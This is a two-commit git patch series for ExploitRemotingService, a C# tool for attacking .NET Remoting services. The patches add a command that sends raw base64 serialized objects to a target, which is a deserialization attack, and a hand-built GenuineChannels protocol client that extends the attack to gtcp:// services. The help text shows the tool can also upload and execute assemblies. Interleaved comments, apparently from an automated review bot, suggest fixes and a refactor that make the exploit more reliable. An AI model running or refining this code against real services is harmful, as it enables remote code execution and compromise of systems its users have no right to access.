From 6eef8bf46fc75520560ba6295a9809408cc89288 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Fri, 2 Mar 2018 10:06:57 +0000
Subject: [PATCH 1/2] Add option to send raw serialized objects
---
 ExploitRemotingService/Program.cs | 39 +++++++++++++++++++++++++------
 README.md | 1 +
 2 files changed, 33 insertions(+), 7 deletions(-)
diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs
index 6ec92ec..cfb6a1f 100644
--- a/ExploitRemotingService/Program.cs
+++ b/ExploitRemotingService/Program.cs
@@ -234,6 +234,7 @@ static void PrintHelp(OptionSet p)
 run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version
+raw base64_object : Send a raw serialized object to the service
 ");
 }
@@ -677,9 +678,8 @@ private static IRemoteClass CreateRemoteClass()
 }
 }
- static object SendRequest(object o, bool remote)
+ static object SendRequest(byte[] data)
 {
- byte[] data = SerializeObject(o, remote);
 MemoryStream stm = new MemoryStream();
 BinaryWriter writer = new BinaryWriter(stm);
@@ -712,7 +712,18 @@ static object SendRequest(object o, bool remote)
 return ParseResult(reader);
 }
- }
+ }
+ }
+
+ static object SendRequest(string base64)
+ {
+ return SendRequest(Convert.FromBase64String(base64));
+ }
+
+ static object SendRequest(object o, bool remote)
+ {
+ byte[] data = SerializeObject(o, remote);
+ return SendRequest(data);
 }
 public static T MakeCall(string path, MethodBase mi, params object[] cmdargs)
@@ -925,9 +936,23 @@ static int Main(string[] args)
 Console.WriteLine("Detected version {0} server", _ver);
 }
- IRemoteClass ret = CreateRemoteClass();
+ if (_cmd.Equals("raw"))
+ {
+ if (_cmdargs.Count != 1)
+ {
+ Console.Error.WriteLine("Must specify base64 encoded object");
+ }
+ else
+ {
+ Console.WriteLine(SendRequest(_cmdargs.First()));
+ }
+ }
+ else
+ {
+ IRemoteClass ret = CreateRemoteClass();
- ExecuteCommand(ret);
+ ExecuteCommand(ret);
+ }
 }
 catch (Exception ex)
 {
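Review bot: In the `raw` branch added to Main, an argument-count mismatch only writes `Must specify base64 encoded object` to stderr and then falls out of the `if`, so control reaches whatever exit-code logic follows the try/catch outside this hunk, and the usage error presumably exits as a success unless something there records it. The simplest fix is to fail on the spot, e.g. `Console.Error.WriteLine("Must specify base64 encoded object"); return 1;`, or to throw so the existing catch reports it like any other failed command. A malformed argument is a different case: `Convert.FromBase64String` throws FormatException and the catch already handles it, but a hint in the usage text (`base64 encoded object (standard base64 alphabet)`) would save users a confusing stack trace. Main starts and ends outside the hunk.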
@@ -939,7 +964,7 @@ static int Main(string[] args)
 else
 {
 return 1;
- }
- }
+ }
+ }
 }
 }
diff --git a/README.md b/README.md
index 04a67c9..22fc931 100644
--- a/README.md
+++ b/README.md
@@ -44,6 +44,7 @@ ls remotedir : List a remote directory
 run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version
+raw base64_object : Send a raw serialized object to the service
 This tool supports exploit both TCP remoting services and local IPC services. To test
From af24843e2fceca888e6e41c6f9cdf8ab390ce790 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Fri, 2 Mar 2018 16:38:17 +0000
Subject: [PATCH 2/2] Exploit TcpGenuineChannels too
---
 ExploitRemotingService/Program.cs | 106 ++++++++++++++++++++++++++++--
 1 file changed, 100 insertions(+), 6 deletions(-)
diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs
index cfb6a1f..c4ee07c 100644
--- a/ExploitRemotingService/Program.cs
+++ b/ExploitRemotingService/Program.cs
@@ -77,6 +77,7 @@ static void SetupServer()
 switch (_uri.Scheme)
 {
+ case "gtcp":
 case "tcp":
 {
 dict["port"] = _port;
@@ -104,7 +105,7 @@ private static Stream BindStream()
 {
 Stream ret = null;
- if (_uri.Scheme == "tcp")
+ if (_uri.Scheme == "tcp" || _uri.Scheme == "gtcp")
 {
 TcpClient client = new TcpClient();
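Review bot: The `case "gtcp":` label added in SetupServer shares the `tcp` branch, so for a GenuineChannels target the tool still registers a stock .NET Remoting TCP listener on `dict["port"]`, while the client side introduced later in the same patch speaks a different framing; a GenuineChannels server can therefore presumably not connect back to this listener, and any command that depends on a server-initiated callback would fail silently under `gtcp://`. If that is the intent, say so above the label — `// gtcp: listener stays a plain TcpChannel; server callbacks are not supported over GenuineChannels` — and otherwise the gtcp case needs its own channel set-up rather than the fall-through. The switch in SetupServer starts and ends outside the hunk.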
@@ -676,8 +677,87 @@ private static IRemoteClass CreateRemoteClass()
 return GetExistingRemoteClass();
 }
- }
-
+ }
+
+ public static void WriteLabelledStream(MemoryStream inputStream, Stream outputStream)
+ {
+ MemoryStream stm = new MemoryStream();
+ BinaryWriter writer = new BinaryWriter(stm);
+
+ writer.Write((byte)0x37); // COMMAND_MAGIC_CODE
+ writer.Write((int)inputStream.Length);
+ writer.Write((byte)1); // Finished?
+ writer.Write(inputStream.ToArray());
+
+ outputStream.Write(stm.ToArray(), 0, (int)stm.Length);
+ outputStream.Flush();
+ }
+
+ static object SendRequestGenuineChannel(byte[] data)
+ {
+ using (Stream netStream = BindStream())
+ {
+ MemoryStream stm = new MemoryStream();
+ BinaryWriter writer = new BinaryWriter(stm);
+
+ byte genuineConnectionType = 1;
+
+ //LowLevel_OpenConnection()
+ // MessageCoder.SerializeConnectionHeader()
+ writer.Write((byte)3); // Protocol Version
+ writer.Write((byte)genuineConnectionType);
+ writer.Write("$/__GC/" + _uri.Host); //ConnectionID / ConnectionName
+
+ WriteLabelledStream(stm, netStream);
+
+ stm = new MemoryStream();
+ writer = new BinaryWriter(stm);
+
+ //SendConnectionInfo
+ writer.Write(String.Format("{0}://{1}", _uri.Scheme, Guid.NewGuid())); // LocalUri
+ writer.Write((int) -1); // Undocumented
+ writer.Write(genuineConnectionType);
+ writer.Write((int)2); // LocalHostUniqueIdentifier
+
+ WriteLabelledStream(stm, netStream);
+
+ BinaryReader reader = new BinaryReader(netStream);
+ reader.ReadByte();
+ Int32 length = reader.ReadByte();
+ reader.ReadInt32();
+ String remoteUri = reader.ReadString();
+ Int32 remoteHostUniqueIdentifier = reader.ReadInt32();
+
+ //LowLevel_StartSending()
+ stm = new MemoryStream();
+ writer = new BinaryWriter(stm);
+
+ writer.Write("D"); // basicSecuritySession
+
+ //MessageCoder.Serialize()
+ writer.Write((byte)0); //Compression
+ writer.Write((byte)1); //GenuineMessageType 1
+ writer.Write(2); // MessageID
+ writer.Write(0); // ReplyToId
+ writer.Write((bool)false); // Is OneWay
+ writer.Write((bool)false); // MarshalByRef
+ writer.Write((Int16)0); // SecuritySessionParameters.Attributes
+ writer.Write(String.Empty); // RemoteTransportUser
+
+ // Write ITransportHeaders
+ writer.Write("__RequestUri");
+ writer.Write(_uri.PathAndQuery);
+ writer.Write("Content-Type");
+ writer.Write("application/octet-stream");
+ writer.Write("__"); // headers end tag
+ writer.Write(data);
+
+ WriteLabelledStream(stm, netStream);
+ }
+
+ return null;
+ }
+
 static object SendRequest(byte[] data)
 {
 MemoryStream stm = new MemoryStream();
@@ -717,13 +797,27 @@ static object SendRequest(byte[] data)
 static object SendRequest(string base64)
 {
- return SendRequest(Convert.FromBase64String(base64));
+ if (_uri.Scheme.Equals("gtcp"))
+ {
+ return SendRequestGenuineChannel(Convert.FromBase64String(base64));
+ }
+ else
+ {
+ return SendRequest(Convert.FromBase64String(base64));
+ }
 }
 static object SendRequest(object o, bool remote)
 {
- byte[] data = SerializeObject(o, remote);
- return SendRequest(data);
+ byte[] data = SerializeObject(o, remote);
+ if (_uri.Scheme.Equals("gtcp"))
+ {
+ return SendRequestGenuineChannel(data);
+ }
+ else
+ {
+ return SendRequest(data);
+ }
 }
 public static T MakeCall(string path, MethodBase mi, params object[] cmdargs)
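Review bot: The reply to the SendConnectionInfo frame is read as `reader.ReadByte(); Int32 length = reader.ReadByte(); reader.ReadInt32();`, whereas WriteLabelledStream frames each request as a 1-byte magic code, a 4-byte length and a 1-byte finished flag; if the server answers with the same framing, which the matching six-byte total suggests, `length` holds only the low byte of the length and the ReadInt32 straddles the remaining length bytes and the flag. The three values read (`length`, `remoteUri`, `remoteHostUniqueIdentifier`) are then never used and the magic code is never compared, so a refused or malformed handshake goes unnoticed and the payload is sent anyway. I would align the reads as `byte magic = reader.ReadByte(); int length = reader.ReadInt32(); byte finished = reader.ReadByte();` and stop with an error when `magic` differs from the `0x37` the request used. Note also that the final WriteLabelledStream is fire-and-forget and the method always returns null, so `Console.WriteLine(SendRequest(...))` in Main prints an empty line whether or not the server accepted the message — a comment such as `// gtcp: no reply is read; a null result only means the bytes were written` belongs above `return null;`. Nothing sets a read timeout on `netStream`, so a server that stops responding after the first frame blocks the tool indefinitely.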
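Review bot: Both SendRequest overloads in this hunk carry an identical `_uri.Scheme.Equals("gtcp")` branch, and together with SetupServer and BindStream (which spell it `== "gtcp"`) that makes four places that must agree on the scheme name, so adding another transport or a typo in one copy silently breaks only part of the tool. The selection belongs in one private helper that both overloads call, written the same way as the other two checks. Worth a comment for callers as well: the gtcp path returns null from SendRequestGenuineChannel while the tcp path returns ParseResult's value, so anything that casts the result — MakeCall<T> starts right after the hunk but its body is not visible — presumably has to cope with null under `gtcp://`.
```csharp
static object SendRequest(string base64)
{
    return SendSerialized(Convert.FromBase64String(base64));
}

static object SendRequest(object o, bool remote)
{
    return SendSerialized(SerializeObject(o, remote));
}

// Single place that picks the wire protocol for an already-serialized payload.
// gtcp: GenuineChannels framing, no reply is read, result is always null.
// anything else: the stock .NET Remoting framing in SendRequest(byte[]).
static object SendSerialized(byte[] data)
{
    return _uri.Scheme == "gtcp" ? SendRequestGenuineChannel(data) : SendRequest(data);
}
```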